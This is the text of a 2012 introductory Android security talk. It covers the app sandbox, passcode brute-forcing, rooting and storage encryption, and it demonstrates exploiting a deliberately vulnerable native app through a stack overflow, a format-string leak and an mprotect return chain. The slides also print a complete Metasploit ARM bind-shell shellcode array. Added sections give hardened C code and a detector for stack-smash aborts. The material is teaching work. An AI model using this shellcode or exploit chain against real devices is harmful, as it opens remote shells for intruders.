Android Security
An Introduction Antonio Barresi
Software Engineer
Péter Somogyvári
Software Engineer
13th October 2012
About us
Antonio Barresi, Software Engineer
Péter Somogyvári, Software Engineer
Outline
1. Android Security Basics
   1. Smartphones, Mobile Security & Android
   2. The Android Platform
   3. Android Device & Data Security
Mobile Security
Base Station
WiFi
Thief
BlueTooth, NFC
Physical Threats
Malware
App Markets
Data on Smartphones
! Emails/SMS
! Contacts
! Pictures
! GPS data
! Google searches & Web history
! Documents
! Account information & Passwords
! Banking data (not persistent)
Android Architecture
What is an App?
! .apk: Android Package
! Name of the package
! Describes components of the App
! Required permissions
! Minimum level of API
! Dalvik Bytecode (all classes in one file)
! MANIFEST.MF: Hashes of all files.
! CERT.SF: Hash of MANIFEST.MF and hashes of all the entries in MANIFEST.MF.
! CERT.RSA: Signature of CERT.SF file including the signer's certificate (public key) itself.
App Installation
! .apk Packages are self signed!
! It's not about the trustworthiness of the developer!
! Within the process a Dalvik VM instance is running
! Most Apps are just Java based
! Or they are Web-based running within WebKit
Kernel
Android Permissions
! Defined within AndroidManifest.xml
Android Permissions
! Require permissions to interact with App
Android Sandbox
! Sandboxing is implemented by the Android Permission Model and Linux User separation
! Processes are separated by different UIDs
! Filesystem Access is authorized by File Permissions
! Android API calls are authorized according to the Android permissions, e.g. access to Contacts, SMS, Location...
! Network, SD Card or Bluetooth access is authorized by Linux Group Membership
http://xkcd.com/538/
Device protection
! Screen lock with PIN, passcode, pattern or face recognition
! Bootloader is locked by default (in most cases)
! Cannot run adb as root on a physical device by default (in most cases)
https://android.googlesource.com/platform/frameworks/base/+/master/policy/src/com/android/internal/policy/impl/LockScreen.java
Passcode Protection
Passcode Protection
! Hashed Passcode/PIN is stored in: /data/system/password.key
Brute-Force Passcode
! Get the hash and the salt
! Brute-Force it!
Brute-Force Passcode
Length in chars   Crack time
4                 ~1m
5                 ~1,5h
6                 ~3,5d
7                 ~219d
8                 ~37y
9                 ~2306y
! Results measured on a mobile i7 2630QM
! Single threaded code
! Times for 6, 7, 8 and 9 chars are extrapolated from the 4- and 5-char measurements
! Use GT 525M and some CUDA magic?
! What about Rainbow Tables?
Boot Process
Init Process
Rooting
! By default there is no way to execute apps as root
! Rooting: find a way to run apps/processes as root!
! E.g. install a su binary
Storage Encryption
! Available since version 3.0 HoneyComb
! Uses dm-crypt which is provided by the Linux kernel
! Key stored on the storage
! Attack: dump the entire storage and bruteforce offline!
Attack Paths
Physical Access
By Software
ADB enabled?
Bootloader unlocked?
Hardware techniques?
Is storage encrypted?
Conclusion
! Passcode should be used
! As complex as possible, as usual ;)
! But it does not offer full protection!
Software Security
! Can be potentially exploited by an attacker to run arbitrary code in the context of the process, e.g. remotely
! The Morris Worm exploited a Memory Corruption Vulnerability in 1988 (one of the first Internet Worms)
Full ASLR* !
And some additional protections, see Android Security Overview for more details.
Android Security Overview: http://source.android.com/tech/security/
A VulnerableNativeApp
A VulnerableNativeApp In Action
Gangnam style!
VulnerableNativeApp Vulnerabilities
[Stack layout diagram (labels only): RETURN_ADDRESS, LOCAL_POINTER, LOCAL_VARIABLE, LOCAL_BUFFER, LOCAL_VARIABLE, LOCAL_VARIABLE; the stack grows towards lower addresses (0x00000000); after the overflow the slots above the buffer read OVERFLOWED LOC_VAR, OVERFLOWED LOC_PTR, OVERFLOWED RET_ADDR]
VulnerableNativeApp Vulnerabilities
Use it to hijack control flow! buf is under user control and we can therefore use our own format string!
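The two defects the slides attribute to VulnerableNativeApp are a socket read of up to 1024 bytes into a smaller fixed-size stack buffer and user input handed to a printf-style function as the format. The hardened shape of both is shown below as an added example; it is not code from the slides or from the VulnerableNativeApp project, and the buffer size RECV_BUFF_SIZE, the function names and the sample inputs are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

#define RECV_BUFF_SIZE 64   /* assumed stack buffer size for this example */

/* Copy a received message into a caller-sized buffer.
 * Returns the number of bytes stored, or -1 if the message does not fit
 * (including room for the terminating NUL).  The destination size, not the
 * wire length, bounds the copy, so an oversized message can never reach the
 * saved registers (R4, LR) above the buffer. */
int receive_message(const uint8_t *wire, size_t wire_len, char *out, size_t out_size)
{
    if (out == NULL || out_size == 0)
        return -1;
    if (wire_len >= out_size) {         /* no room for data + NUL: refuse it */
        out[0] = '\0';
        return -1;
    }
    memcpy(out, wire, wire_len);
    out[wire_len] = '\0';
    return (int)wire_len;
}

/* Render a log line about the input.  The input is always an argument to a
 * fixed "%s" format and never the format string itself, so "%x" or "%n"
 * sequences inside it are printed literally instead of being interpreted.
 * Returns the line length, or -1 if the line was truncated. */
int safe_log_line(char *dst, size_t dst_size, const char *input)
{
    int n = snprintf(dst, dst_size, "VulnerableNativeApp: input read: %s", input);
    if (n < 0 || (size_t)n >= dst_size)
        return -1;
    return n;
}

int main(void)
{
    char buf[RECV_BUFF_SIZE];
    char line[128];
    const char *small = "hello";        /* constructed: a message that fits */
    uint8_t big[1024];
    memset(big, 'A', sizeof big);       /* constructed: a 1024-byte message */

    printf("small: %d\n", receive_message((const uint8_t *)small, strlen(small), buf, sizeof buf));
    printf("big:   %d\n", receive_message(big, sizeof big, buf, sizeof buf));
    if (safe_log_line(line, sizeof line, "%x%x%n") > 0)
        puts(line);
    return 0;
}
```

Rejecting an oversized message outright (rather than silently truncating it) keeps the length check visible to the caller, which is where a protocol-level error response belongs.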
! Instruction Sets
! ARM, Thumb and Jazelle Instruction Set
! ARM uses 32 bit opcodes, Thumb 16 bit opcodes
! Execute Thumb instructions by a branch to <address>+1
push {r4, lr}
movs r0, #4
bl   0x80b01b88
add  r3, sp, #36
ldr
str
VulnerableNativeApp Vulnerabilities
The Plan
[Diagram: process stack of readFromSocket before the overflow, above the init_server() stack frame: LR (RET_ADDRESS), R4, n=0, the buffer filled by read(fd, recvBuff, 1024); after the overflow: ADDRESS OF SHELLCODE, OVERFLOWED R4, OVERFLOWED n]
Function enter:
0x80b01b88 <+0>:   push {r4, lr}
0x80b01b8a <+2>:   ldr  r4, [pc, #120]
0x80b01b8c <+4>:   add  sp, r4
Function leave:
0x80b01bfe <+118>: lsls r3, r3, #2
0x80b01c00 <+120>: add  sp, r3
0x80b01c02 <+122>: pop  {r4, pc}
Stack Protection
[Diagram: process stack of readFromSocket before and after the overflow, with a stack guard between the locals and the saved registers; after the overflow: ADDRESS OF SHELLCODE, OVERFLOWED R4, OVERFLOWED GUARD, OVERFLOWED n]
r2, r3 0x80b01bfc <readFromSocket+116> 0x80b01974 r3, #132 ; 0x84 r3, r3, #2 sp, r3 {r4, pc}
Stack Protection
logcat:
...
I/VulnerableNativeApp( 630): VulnerableNativeApp: input read: AAAAAAAAAA
F//system/bin/app_process( 630): stack corruption detected: aborted
I/ActivityManager( 162): Process com.example.VulnerableNativeApp (pid 630) has died.
...
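The logcat excerpt above is what a stack-protector abort looks like from the outside: a fatal line from the process itself followed by ActivityManager reporting the same pid dead. The following added example (not from the slides) parses lines in that brief logcat format and flags such aborts, tying the fatal line to the matching "has died" line by pid; the sample log is constructed from the excerpt above, and the function names and the 64-byte tag limit are assumptions of the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    char prio;          /* V D I W E F */
    char tag[64];       /* assumed upper bound on tag length */
    int  pid;
    const char *msg;    /* points into the original line */
} logcat_entry;

/* Parse a line of the form "P/tag( pid): message".
 * Returns 1 on success, 0 if the line does not have that shape. */
int parse_logcat_line(const char *line, logcat_entry *e)
{
    const char *p = line;
    if (p[0] == '\0' || !strchr("VDIWEF", p[0]) || p[1] != '/')
        return 0;
    e->prio = p[0];
    p += 2;
    const char *open = strchr(p, '(');
    if (!open || (size_t)(open - p) >= sizeof e->tag)
        return 0;
    memcpy(e->tag, p, (size_t)(open - p));
    e->tag[open - p] = '\0';
    p = open + 1;
    while (*p == ' ')
        p++;
    char *end;
    long pid = strtol(p, &end, 10);
    if (end == p || strncmp(end, "): ", 3) != 0)
        return 0;
    e->pid = (int)pid;
    e->msg = end + 3;
    return 1;
}

/* Scan log lines for the stack-protector abort.  Returns how many fatal
 * "stack corruption detected" lines were seen; for the first one, stores its
 * pid and whether ActivityManager later reported that pid as died. */
int find_stack_smash_aborts(const char *const *lines, size_t n, int *first_pid, int *confirmed)
{
    int count = 0;
    *first_pid = -1;
    *confirmed = 0;
    for (size_t i = 0; i < n; i++) {
        logcat_entry e;
        if (!parse_logcat_line(lines[i], &e))
            continue;
        if (e.prio == 'F' && strstr(e.msg, "stack corruption detected")) {
            if (count++ == 0)
                *first_pid = e.pid;
        } else if (*first_pid >= 0 && strcmp(e.tag, "ActivityManager") == 0
                   && strstr(e.msg, "has died")) {
            char needle[32];
            snprintf(needle, sizeof needle, "(pid %d)", *first_pid);
            if (strstr(e.msg, needle))
                *confirmed = 1;
        }
    }
    return count;
}

/* Constructed sample, taken from the logcat excerpt on the slide. */
static const char *const SAMPLE_LOG[] = {
    "I/VulnerableNativeApp( 630): VulnerableNativeApp: input read: AAAAAAAAAA",
    "F//system/bin/app_process( 630): stack corruption detected: aborted",
    "I/ActivityManager( 162): Process com.example.VulnerableNativeApp (pid 630) has died.",
};
#define SAMPLE_LOG_LEN (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

int main(void)
{
    int pid, confirmed;
    int hits = find_stack_smash_aborts(SAMPLE_LOG, SAMPLE_LOG_LEN, &pid, &confirmed);
    printf("stack-protector aborts: %d (first pid %d, death confirmed: %d)\n",
           hits, pid, confirmed);
    return 0;
}
```

A repeated abort of this kind from one package, especially while it has a listening socket open, is the signal worth alerting on: the protector stopped the overwrite, but the input that caused it was still delivered.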
RANDOM GUARD
echo stack()
ADDRESS OF SHELLCODE
0x80b01c02 <+122>: pop {r4, pc}
Non-Executable Stack
Process Stack of readFromSocket before Overflow
Process Stack of readFromSocket after Overflow
ADDRESS OF SHELLCODE
stack is nonexecutable!
[Residue of a memory map listing: only the offset column (00000000, 00020000, 00001000, 00040000, 00009000) and the device column (8a:0c / 00:00) survived extraction]
! mprotect is a system call and there is no restriction in the Android Linux Kernel for mprotect so far!
! Our new plan: let's call mprotect within libc to make the stack executable and let's then execute our shellcode!
sp = new stack pointer R6 = some value R2 = 7 (rwx) R1 = 1024 R0 = addr of stack some value ADDRESS ldmibvc -> pc
leaked by format string vuln leaked too predictable as no ASLR predictable as no ASLR
{r4, pc} {r4, r7} r7, #125 0x00000000 {r4, r7} r0, r0 lr
mprotect (r0,r1,r2)
sp = new stack pointer R6 = some value R2 = 7 (rwx) R1 = 1024 R0 = addr of stack some value ADDRESS ldmibvc -> pc
And mprotect() will return to our shellcode too! What a nice function! :)
The Shellcode
! We did not talk about shellcodes
! Just use msfpayload
! linux/armle/shell_bind_tcp
! Or write your own ARM assembly with arm-linux-gnueabi-as
$ msfpayload linux/armle/shell_bind_tcp C
/*
 * linux/armle/shell_bind_tcp - 232 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LPORT=4444, RHOST=, PrependSetresuid=false,
 * PrependSetreuid=false, PrependSetuid=false,
 * PrependChrootBreak=false, AppendExit=false,
 * InitialAutoRunScript=, AutoRunScript=, SHELL=/system/bin/sh,
 * SHELLARG=-C
 */
unsigned char buf[] =
"\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x01\x70\xa0"
"\xe3\x07\x74\xa0\xe1\x19\x70\x87\xe2\x00\x00\x00\xef\x00\x60"
"\xa0\xe1\xa4\x10\x8f\xe2\x10\x20\xa0\xe3\x01\x70\xa0\xe3\x07"
"\x74\xa0\xe1\x1a\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1"
"\x01\x70\xa0\xe3\x07\x74\xa0\xe1\x1c\x70\x87\xe2\x00\x00\x00"
"\xef\x06\x00\xa0\xe1\x01\x10\x41\xe0\x02\x20\x42\xe0\x01\x70"
"\xa0\xe3\x07\x74\xa0\xe1\x1d\x70\x87\xe2\x00\x00\x00\xef\x00"
"\x60\xa0\xe1\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x70\xa0\xe3"
"\x00\x00\x00\xef\x01\x10\x51\xe2\xfa\xff\xff\x5a\x48\x00\x8f"
"\xe2\x04\x40\x24\xe0\x10\x00\x2d\xe9\x0d\x20\xa0\xe1\x04\x00"
"\x2d\xe9\x0d\x20\xa0\xe1\x10\x00\x2d\xe9\x48\x10\x9f\xe5\x02"
"\x00\x2d\xe9\x00\x20\x2d\xe9\x0d\x10\xa0\xe1\x04\x00\x2d\xe9"
"\x0d\x20\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0"
"\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x02\x00\x11\x5c\x00\x00"
"\x00\x00\x2f\x73\x79\x73\x74\x65\x6d\x2f\x62\x69\x6e\x2f\x73"
"\x68\x00\x00\x2d\x43\x00\x00";
$
ASLR compared
Start address of each mapping, one column per run:

Region        Perms   Start addresses observed across runs
stack         rw-p    beeb7000
libc          r-xp    afd00000 afd00000 40087000 400ac000 4005e000 4009d000
linker        r-xp    b0001000 b0001000 b0001000 b0001000 400fc000 4012a000
app_process   r-xp    00008000 00008000 00008000 00008000 4005a000 4005e000
?
RANDOM GUARD is leaked through the format string vulnerability
What about some pointer to libc?
RANDOM GUARD
echo stack()
Thank you!
Questions?